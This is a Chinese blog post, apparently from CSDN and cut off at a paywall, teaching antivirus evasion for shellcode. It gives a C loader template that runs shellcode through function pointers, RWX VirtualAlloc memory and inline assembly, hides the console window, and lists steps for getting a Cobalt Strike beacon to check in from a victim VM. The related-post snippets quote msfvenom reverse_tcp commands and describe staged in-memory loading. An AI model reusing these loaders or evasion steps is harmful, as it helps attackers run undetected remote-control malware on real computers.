免杀对抗-ShellCode上线+回调编译执行+混淆变异算法

最新推荐文章于 2023-10-25 22:24:35 发布
最新推荐文章于 2023-10-25 22:24:35 发布
阅读量3.3k 收藏 15
点赞数 5
分类专栏: 免杀对抗 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/132793196
版权

C/C++ --ShellCode-免杀对抗

介绍:

         shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。

为什么要使用shellcode

       因为shellcode的免杀手段多,损坏的可能性小,能自定义更多选择。

环境:

攻击机:kali--->cs服务端和msfwin11--->cs客户端

受害机:win10--->虚拟机

调用shellcode的五种原生态方式:

文件名:原生态.c

#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")   //windows控制台程序不出黑窗口
unsigned char buf[] = 你的shellcode

int main()
{
     //方式一:指针执行
     //((void(*)(void)) & buf)();
	
     //方式二:强制类型转换
     //((void(WINAPI*)(void))&buf)();
	
     //方式三:申请动态内存加载
     char* Memory;
     Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
     memcpy(Memory, buf, sizeof(buf));
     ((void(*)())Memory)();

    //方式四:嵌入汇编加载
    //__asm {
    //lea eax,buf
    //call eax
    //}
	
    //方式五:汇编花指令
    //__asm{
    //mov eax, offset shellcode
    //_emit 0xFF
    //_emit 0xE0
    //}
}
 

一、保证cs/msf生成的shellcode能正常上线

测试:cs上线

1.kali启动服务端cs

2.windows启动客户端cs连接

3.创建监听器Listeners

4.生成shellcode脚本

5.打开Visual Studio工具,将生成的shellcode放到加载脚本中(使用的调用执行方式是:申请动态内存加载),利用C/C++语言编译成exe执行文件。注意:编译时要注意位数

最低0.47元/天 解锁文章
xiaoheizi安全
关注
专栏目录
CVE-2015-1641 Office类型混淆漏洞及shellcode分析
xiaoi123的博客
08-01 532
作者:枕边月亮 原文来自:CVE-2015-1641 Office类型混淆漏洞及shellcode分析   0x1实验环境:Win7_32位,Office2007 0x2工具:Windbg,OD,火绒剑,UltraEdit,oletools;   0x3漏洞简述:word在解析docx文档的displacedByCustomXML属性时未对customXML对象进行验证,可以传入其他标...
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 1287
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
shellCode免杀技巧
qq_39330735的博客
05-15 2632
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
CS结合python3混淆shellcode制作免杀脚本
m0_48108919的博客
03-19 7466
文章参考自:Cobalt Strike免杀操作 - 技术文章 - 90Sec 0x00基础知识 Cobalt Strike简介 Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Shellcode介绍 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反
免杀shellcode混淆
qq_63217130的博客
10-25 399
现在的杀软不仅仅会对恶意文件进行一个静态扫描、分析其特征以外,杀软还会将文件丢到虚拟沙箱中去运行,挂一个hook去跟踪、监控调用的api函数并判断其行为,有的杀软甚至是可以扫描内存的(比如卡巴斯基),shellcode在内存中解密后就很容易暴露,这加大了与杀软对抗的难度。所以仅仅是shellcode混淆已经很难再bypass掉各种杀软了,但是这并不意外着shellcode混淆就已失去意义了!!
Shellcode混淆研究
SHELLCODE_8BIT的博客
05-25 237
X86 Shellcode Obfuscation - Part 1
免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写
xiaoheizi的博客
09-24 1549
无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的shellcode通过分块传输的方法上传然后再拼接,这些体现了基本的”分离“思想。3.因为实战的时候不需要加密,所以就代码中的加密代码剔除,减少特征。
免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
xiaoheizi的博客
09-13 1257
1.生成或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode3.将生成的shellcode放到执行代码中,运行代码,cs成功上线1.执行命令,生成shellcode命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.129 lport=4444 -f c2.msf设置监听3.将shellcode放到执行脚本中运行。
免杀对抗-java语言-shellcode免杀-源码修改+打包exe
xiaoheizi的博客
09-21 1108
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
ZSC:OWASP ZSC-Shellcode混淆代码生成器
02-04
OWASP ZSC 此软件的创建是为了挑战抗病毒技术,研究新的加密方法以及保护包含重要数据的敏感开放源文件。 对于任何非法使用,贡献者和OWASP基金会概不负责。 OWASP ZSC是用python编写的开源软件,可让您生成自定义的shellcode并将脚本转换为混淆的脚本。 可以使用python在Windows / Linux / OSX上运行该软件。 OWASP页面: : 文件: : 主页:http: 功能:http: GitHub: : 存档: : 邮件列表: : API: : 有关更多信息,请阅读主目录中的文档文件或访问主页。
python 混淆源码
11-24
python 混淆源码,代码是2.7的 ,可以混淆3.5和2.7的源码,具体有什么问题未知,我只是改了一下输入输出方式,其最源码是在https://github.com/astrand/pyobfuscate 12年前老代码了,仅供参考
免杀对抗-C#+go语言-混淆+防反编译+分离
xiaoheizi的博客
09-19 1644
介绍:上传脚本到目标系统时,很容易就会被杀软将脚本反编译检测,所以将脚本使用ConfuserEx项目进行保护,防止杀软反编译检测。命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=监听。命令:go build -ldflags "-s -w -H=windowsgui" 5.go。1.打开工具,将生成的exe程序拖入工具,然后如下图操作。执行文件,上传到目标系统,被火绒杀死。正常上传到目标系统,成功绕过检测。上传到目标系统,执行程序,
怎么生成木马_免杀系列CS木马shellcode分离免杀上线
weixin_39970668的博客
12-20 3411
10月13日CS木马shellcode分离免杀上线最近在学习CS怎么去免杀,今天来分享一下吧,反正有手就行呗0x00Article directory [目录结构]0x01 环境介绍0x02 插件部署0x03 改造流程0x04 测试效果0x05总结0x01环境介绍本次免杀所使用的是shellcode分离免杀技术CS版本:4.0语言:Golang插件:项目地址:http://gith...
多多token提取器_工具:ShellCode混淆器Obfuscator
weixin_35410816的博客
01-13 2286
以前的文章中介绍过一个C#开发的混淆器AvIator,效果很是不错,但一个利器的问世会被盯上并被研究透彻后很快失效(前文url:https://mp.weixin.qq.com/cgi-bin/appmsg?t=media/appmsg_edit&action=edit&type=10&appmsgid=100000675&isMul=1&...
python编写shellcode_免杀 - shellcode简单混淆BypassAv
weixin_32539505的博客
02-10 1741
前言在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit环境: Cobalt strike 4.1 Python pyinstaller何为shellcode?百度百科是这样介绍它的:“shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获...
免杀学习-认识shellcode
willing-sir的博客
12-16 726
免杀学习-认识shellcode 接着暑假的学习继续更,这学期比较忙,学校里要过逆向考试,加上学生会加上新生班助,还要忙着研究小车做比赛作品,杂七杂八的事一大堆就没更。 这个学期正好学了点逆向的基础知识,那就借此机会学习一下免杀,也是内网渗透比较重要的一个东西,争取这个寒假搓个免杀马,玩一玩兄弟的电脑 什么是shellcode 这一大堆反斜杠加数字是一串msfvenom生成的shellcod...
shellcode 免杀
05-29
Shellcode 免杀技术是指通过对 Shellcode 代码进行加密、混淆、变形等手段,使其在被杀毒软件或安全设备检测时无法被识别,从而达到免杀的目的。 以下是一些常见的 Shellcode 免杀技术: 1. 加密:将 Shellcode 代码进行加密,使其在内存中存储时无法被检测到。 2. 随机变形:通过修改 Shellcode 代码中的一些关键字、函数名等来使其难以被检测到。 3. 延时加载:将 Shellcode 代码分为多个部分,只有在特定条件下才会加载,从而避免被杀毒软件或安全设备检测到。 4. 模块化:将 Shellcode 代码拆分为多个模块,每个模块都可以独立执行,从而难以被检测到。 5. 零宽度字符:利用 Unicode 中的零宽度字符来隐藏 Shellcode 代码,使其在被杀毒软件或安全设备检测时无法被识别。 需要注意的是,Shellcode 免杀技术只是提高了 Shellcode免杀能力,但并不能完全避免被检测到。因此,在实际应用中,还需要结合其他防御措施来确保系统的安全性。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值